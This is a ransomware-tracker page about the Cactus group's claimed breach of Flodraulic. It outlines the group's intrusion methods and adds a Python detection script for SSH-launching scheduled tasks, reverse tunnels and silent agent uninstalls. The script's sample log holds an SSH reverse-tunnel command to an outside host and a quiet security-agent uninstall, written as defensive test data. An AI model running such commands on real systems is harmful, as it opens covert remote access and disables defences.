Flodraulic Faces Major Data Breach from Cactus Ransomware Attack

Incident Date:

September 3, 2024


Overview

Title

Flodraulic Faces Major Data Breach from Cactus Ransomware Attack

Victim

Flodraulic

Attacker

Cactus

Location

Georgetown, Canada

First Reported

September 3, 2024

Flodraulic Hit by Cactus Ransomware Attack

Flodraulic, a fluid power and control systems provider, has been listed as a victim of the Cactus ransomware group. According to the group's leak-site posting, 32GB of data was exfiltrated, of which less than 1% has been published so far. The data described as compromised includes personal and corporate information on employees, customer details, business contracts, project specifics, technical drawings, financial documents, and corporate correspondence.

About Flodraulic

Founded in 1980 in Toronto, Canada, Flodraulic has grown into a comprehensive fluid power and control systems provider specializing in hydraulic and pneumatic technologies. The company operates globally, with a workforce of approximately 649 employees across North America and Europe. Flodraulic is known for highly customized hydraulic power units and components, integrated hydraulic and electronic solutions, and extensive engineering and technical support. Its investment in R&D has positioned it as a leader in motion control technologies.

Attack Overview

The ransomware attack on Flodraulic has caused significant financial and reputational damage, estimated at $58.4 million. Given the sensitivity of the exposed material (technical drawings, contracts and financial records) and the company's international customer base, the breach poses substantial risks to confidentiality and financial stability. It also underscores the need for controls against the specific intrusion techniques the group is known to use, which are described below.

About the Cactus Ransomware Group

First observed in March 2023, the Cactus ransomware group has quickly become a notable player in the ransomware landscape. The group gains initial access by exploiting vulnerabilities in VPN appliances and through phishing. Cactus follows a double-extortion model: data is exfiltrated before encryption, and the group threatens to leak it if the ransom is not paid. The ransomware executable is itself delivered in encrypted form and is unpacked only at run time with a key supplied on the command line, so static antivirus scanning has little to match against until the payload is already executing.

Penetration and Impact

Cactus primarily gains access to networks by exploiting known vulnerabilities in VPN devices, notably those from Fortinet, and in data analytics platforms such as Qlik Sense. The group also buys stolen credentials on underground forums to facilitate intrusions. Once inside, Cactus establishes command and control over SSH and uses scheduled tasks to maintain persistence. The operators scan the network to identify additional targets and often disable security software before deploying the encryptor.
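The persistence and defence-evasion steps above (scheduled tasks, SSH-based command and control, removal of security software) leave traces in Windows event logs that a detection engineer can key on. The following is an added example, not code from the original page and not anything attributable to the Cactus operators: it scans a handful of constructed log records for a scheduled task whose action launches an SSH client, an SSH process opening a reverse tunnel (`-R`), and a silent `msiexec` uninstall. The record layout, hostnames, task names and the assumption that endpoint agents are removed via `msiexec /x` are all illustrative; map the field names onto your own SIEM schema before use.

```python
"""Detection sketch for Cactus-style persistence and defence evasion.

Constructed input: JSON lines loosely modelled on Windows Security
Event ID 4698 (scheduled task created) and Sysmon Event ID 1 (process
creation). Field names are simplified for the example.
"""
import json
import re
from dataclasses import dataclass

# An SSH client binary anywhere in a command line (path separator, space or
# quote before the name; extension optional).
SSH_CLIENT = re.compile(r"(?:^|[\\/\s\"])(?:ssh|plink|putty)(?:\.exe)?(?=[\s\"]|$)", re.I)
# ssh -R <port>:<host>:<port> publishes a local service at the remote end,
# which is how an attacker turns an outbound SSH session into a backdoor.
REVERSE_TUNNEL = re.compile(r"(?:^|\s)-R\s*\S+:", re.I)
# msiexec with an uninstall switch (/x or /uninstall) and a quiet switch
# (/q, /qn, /qb): the form used to remove an agent without prompting anyone.
MSI_QUIET_UNINSTALL = re.compile(
    r"\bmsiexec(?:\.exe)?\b(?=.*\s/(?:x|uninstall)\b)(?=.*\s/q[nb]?\b)", re.I
)


@dataclass
class Alert:
    event_id: int
    host: str
    rule: str
    detail: str


def analyze(record: dict) -> list[Alert]:
    """Apply the three rules to one parsed event record."""
    alerts: list[Alert] = []
    eid = record.get("EventID")
    host = record.get("Computer", "?")
    if eid == 4698:  # scheduled task created
        cmd = f"{record.get('Command', '')} {record.get('Arguments', '')}".strip()
        if SSH_CLIENT.search(cmd):
            alerts.append(Alert(eid, host, "task-launches-ssh",
                                f"{record.get('TaskName')}: {cmd}"))
    elif eid == 1:  # process creation
        cmd = record.get("CommandLine", "")
        if SSH_CLIENT.search(cmd) and REVERSE_TUNNEL.search(cmd):
            alerts.append(Alert(eid, host, "ssh-reverse-tunnel", cmd))
        if MSI_QUIET_UNINSTALL.search(cmd):
            alerts.append(Alert(eid, host, "silent-msi-uninstall", cmd))
    return alerts


def scan(log_text: str) -> list[Alert]:
    """Parse newline-delimited JSON and return every alert in input order."""
    alerts: list[Alert] = []
    for line in log_text.splitlines():
        line = line.strip()
        if line:
            alerts.extend(analyze(json.loads(line)))
    return alerts


# Constructed sample: one malicious task, one benign task, one reverse tunnel,
# one quiet uninstall, one benign quiet install, one benign SSH (git fetch).
SAMPLE_LOG = r"""
{"EventID": 4698, "Computer": "WS-ENG-07", "TaskName": "\\Microsoft\\Windows\\Update\\Sync", "Command": "C:\\Windows\\System32\\OpenSSH\\ssh.exe", "Arguments": "-N -R 2222:127.0.0.1:3389 ops@203.0.113.10"}
{"EventID": 4698, "Computer": "WS-ENG-07", "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "Command": "%windir%\\system32\\defrag.exe", "Arguments": "-c -h -o -$"}
{"EventID": 1, "Computer": "WS-ENG-07", "Image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe", "CommandLine": "ssh.exe -N -R 2222:127.0.0.1:3389 ops@203.0.113.10"}
{"EventID": 1, "Computer": "WS-ENG-07", "Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "msiexec.exe /x {0A1B2C3D-0000-4000-8000-000000000001} /qn /norestart"}
{"EventID": 1, "Computer": "SRV-FILE-02", "Image": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "msiexec.exe /i C:\\Temp\\7z2301-x64.msi /qn"}
{"EventID": 1, "Computer": "SRV-FILE-02", "Image": "C:\\Program Files\\Git\\usr\\bin\\ssh.exe", "CommandLine": "ssh.exe git@github.com git-upload-pack repo.git"}
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"[{a.rule}] {a.host} (event {a.event_id}): {a.detail}")
```

The benign records matter as much as the malicious ones: a plain `ssh.exe` invocation or a quiet MSI *install* should not fire, otherwise the rules drown in developer and software-deployment noise. In production, enrich the `msiexec /x` rule with the product GUIDs of your own endpoint agents and alert at higher severity when one of those is the target.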

Recent Ransomware Attacks

The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing near real-time tracking of ransomware attacks, groups and their victims. Given threat actors' lucrative success so far, ransomware has become the most ubiquitous, and the most financially and informationally damaging, cyber threat to businesses and organizations today.

The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.